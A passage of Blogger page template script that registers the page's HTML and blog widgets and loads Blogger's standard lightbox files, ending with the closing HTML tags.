{}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML3', 'main', document.getElementById('HTML3'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML10', 'main', document.getElementById('HTML10'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML12', 'main', document.getElementById('HTML12'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML13', 'main', document.getElementById('HTML13'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_BlogView', new _WidgetInfo('Blog1', 'main', document.getElementById('Blog1'), {'cmtInteractionsEnabled': false, 'lightboxEnabled': true, 'lightboxModuleUrl': 'https://www.blogger.com/static/v1/jsbin/1666805145-lbx.js', 'lightboxCssUrl': 'https://www.blogger.com/static/v1/v-css/13464135-lightbox_bundle.css'}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML11', 'sidebar', document.getElementById('HTML11'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML9', 'sidebar', document.getElementById('HTML9'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML7', 'sidebar', document.getElementById('HTML7'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML6', 'sidebar', document.getElementById('HTML6'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML5', 'sidebar', document.getElementById('HTML5'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML2', 'sidebar', document.getElementById('HTML2'), {}, 'displayModeFull')); </script> </body> </html>